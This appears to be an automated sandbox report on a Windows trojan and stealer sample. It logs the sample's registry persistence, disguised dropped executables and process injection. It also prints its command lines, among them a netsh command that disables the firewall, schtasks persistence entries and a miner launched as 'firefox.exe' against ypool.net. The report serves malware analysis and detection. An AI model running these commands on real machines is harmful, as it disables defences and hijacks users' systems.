Malware Analysis Report

2024-11-16 13:22

Sample ID 240614-ef3w1ayaml
Target c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225
SHA256 c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225
Tags
evasion persistence spyware stealer trojan
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225

Threat Level: Likely malicious

The file c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225 was found to be: Likely malicious.

Malicious Activity Summary

evasion persistence spyware stealer trojan

Modifies Installed Components in the registry

Modifies Windows Firewall

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Adds Run key to start application

Checks whether UAC is enabled

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 03:53

Signatures

AutoIT Executable

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 03:53

Reported

2024-06-14 03:56

Platform

win7-20240508-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe"

Signatures

Modifies Installed Components in the registry

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Windows Desktop Gadgets\Version = "12,1,7601,17714" | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Windows Desktop Gadgets | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Windows Desktop Gadgets\StubPath = "\"C:\\Program Files\\Common Files\\System\\ado\\de-DE\\sidebar.exe\"" | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Windows Desktop Gadgets\Version = "12,1,7601,17714" | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Windows Desktop Gadgets | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\Windows Desktop Gadgets\StubPath = "\"C:\\Program Files\\Common Files\\System\\ado\\de-DE\\sidebar.exe\"" | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\netsh.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
N/A | N/A | N/A | N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\CTFMon = "\"C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\ctfmon.exe\"" | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\BTModemProtection = "\"C:\\Program Files\\VideoLAN\\VLC\\locale\\tt\\BTModemProtection.exe\"" | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppExtender = "\"C:\\Program Files\\VideoLAN\\VLC\\locale\\lt\\AppExtB.exe\"" | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\Adobe Reader Speed Launcher = "\"C:\\Program Files\\Microsoft Games\\SpiderSolitaire\\es-ES\\Reader_sl.exe\"" | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\CTFMon = "\"C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\ctfmon.exe\"" | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\BTModemProtection = "\"C:\\Program Files\\VideoLAN\\VLC\\locale\\tt\\BTModemProtection.exe\"" | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppExtender = "\"C:\\Program Files\\VideoLAN\\VLC\\locale\\lt\\AppExtB.exe\"" | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\Adobe Reader Speed Launcher = "\"C:\\Program Files\\Microsoft Games\\SpiderSolitaire\\es-ES\\Reader_sl.exe\"" | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A

Checks whether UAC is enabled

evasion trojan
Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A

AutoIT Executable

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ctfmon.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\ado\de-DE\~tqiltyd.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File created | C:\Program Files\Common Files\System\ado\de-DE\sidebar.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\lt\~pngjvft.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\lt\AppExtB.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ctfmon.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\lt\AppExtB.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\Reader_sl.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\tt\~tseyeab.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\tt\BTModemProtection.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\~jjiocdl.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File created | C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\Reader_sl.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\ado\de-DE\sidebar.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\~ymrncmc.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\locale\tt\BTModemProtection.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1868 wrote to memory of 2304 | N/A | C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe
PID 1868 wrote to memory of 2304 | N/A | C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe
PID 1868 wrote to memory of 2304 | N/A | C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe
PID 1868 wrote to memory of 2304 | N/A | C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe
PID 2304 wrote to memory of 2728 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 2728 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 2728 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 2736 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 2736 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 2736 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 1864 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 1864 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 1864 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\system32\cmd.exe
PID 2304 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2360 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1944 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1944 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1944 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1716 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1716 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1716 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2100 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2100 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2100 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2884 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2884 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 2884 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Windows\System32\schtasks.exe
PID 2304 wrote to memory of 1736 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe
PID 2304 wrote to memory of 1736 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe
PID 2304 wrote to memory of 1736 | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe

"C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe"

C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe

"C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 18 /TN "AppExtender" /TR "\"C:\Program Files\VideoLAN\VLC\locale\lt\AppExtB.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 7 /TN "Adobe Reader Speed Launcher" /TR "\"C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\Reader_sl.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 14 /TN "CTFMon" /TR "\"C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ctfmon.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 32 /TN "BTModemProtection" /TR "\"C:\Program Files\VideoLAN\VLC\locale\tt\BTModemProtection.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "CTFMon" /TR "\"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uu0g08su.default-release\extension-store\ctfmon.exe\""

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

C:\Windows\System32\netsh.exe

"C:\Windows\System32\netsh.exe" firewall set opmode mode=DISABLE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /C DIR /A:D /S /B *

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 18 /TN "AppExtender" /TR "\"C:\Program Files\VideoLAN\VLC\locale\lt\AppExtB.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 7 /TN "Adobe Reader Speed Launcher" /TR "\"C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\Reader_sl.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 14 /TN "CTFMon" /TR "\"C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ctfmon.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC MINUTE /MO 32 /TN "BTModemProtection" /TR "\"C:\Program Files\VideoLAN\VLC\locale\tt\BTModemProtection.exe\""

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "CTFMon" /TR "\"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uu0g08su.default-release\extension-store\ctfmon.exe\""

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -o ypool.net -u node.bot4 -p x -t 2 -m512

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | ypool.net | udp

Files

memory/1868-0-0x00000000001F0000-0x00000000001F1000-memory.dmp

\Users\Admin\AppData\Local\Temp\~e8833c24.exe

MD5 0db351c2c43f243ea9335c8b8b58b6a0
SHA1 5b2d295d4b2a489bad864896d73e0ea26c2d50cf
SHA256 ce544d0f3b44382b5a0f7632c3bba2cf2ec470d8744513fbba1e7dab2c5b23b4
SHA512 cc2201665d3dd4ac72f387b97a97442fde1b2908024c409410a4f4a368030080ecd9e5e9412095003bfcaf4f224d39219ab6c64b942c505961dc8814de82bbf6

memory/2304-13-0x0000000002300000-0x0000000002301000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uu0g08su.default-release\extension-store\~hohtaou.tmp

MD5 81051bcc2cf1bedf378224b0a93e2877
SHA1 ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA512 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe

MD5 5eb5360cf19e9c0280f6e1b0f944d450
SHA1 c7ce09623b495acb79c6cfa7129be28abc6dc140
SHA256 17088be03a4c3f40638a87b8c5faf03acca53fa473b0aa34951595595deeadcd
SHA512 cd88c396983fceb073aa1e995e11ebfc9393d536c61bf1abcfc9d65b78121edec060e8886f21c546264ec99636ae7c82f1cbb8c73f77861df3bb9382ba17c980

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 03:53

Reported

2024-06-14 03:56

Platform

win10v2004-20240508-en

Max time kernel

143s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe"

Signatures

Modifies Installed Components in the registry

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\iTunes\StubPath = "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sv\\iTunesHelper.exe\"" | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\iTunes\Version = "12,1,7601,17714" | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\iTunes | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\iTunes\StubPath = "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sv\\iTunesHelper.exe\"" | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\iTunes\Version = "12,1,7601,17714" | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\iTunes | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\netsh.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\c7e62994e4d9cbb42f7c6aad4fc9d2cf4bcf71bb55617e2b85c2cc572a48b225.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DAEMON Tools Lite = "\"C:\\Program Files\\Microsoft Office\\root\\vfs\\Windows\\Installer\\{90160000-006E-0409-1000-0000000FF1CE}\\DTLite.exe\"" | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\IDT PC Audio = "\"C:\\Program Files\\VideoLAN\\VLC\\locale\\bs\\LC_MESSAGES\\sttray64.exe\"" | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\IntelAPMClient = "\"C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\amclient.exe\"" | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ComAgent = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mozilla\\Firefox\\ComAgent.exe\"" | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DAEMON Tools Lite = "\"C:\\Program Files\\Microsoft Office\\root\\vfs\\Windows\\Installer\\{90160000-006E-0409-1000-0000000FF1CE}\\DTLite.exe\"" | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\IDT PC Audio = "\"C:\\Program Files\\VideoLAN\\VLC\\locale\\bs\\LC_MESSAGES\\sttray64.exe\"" | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\IntelAPMClient = "\"C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\amclient.exe\"" | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ComAgent = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mozilla\\Firefox\\ComAgent.exe\"" | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A

Checks whether UAC is enabled

evasion trojan
Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A

AutoIT Executable

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\~zfqldnq.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\~cinivab.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\~knvgihv.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File created | C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_2019.430.2026.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\~pxycziy.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\~gknjcsz.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Place\~knvgihv.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\amclient.exe | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PlaceCard\contrast-white\~lnugsvv.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\sttray64.exe | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\iTunesHelper.exe | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\~bvvdmbp.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\~suhwevh.tmp | C:\Users\Admin\AppData\Local\Temp\~e8833c24.exe | N/A
File created | C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\DTLite.exe | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\~zfqldnq.tmp | C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe | N/A
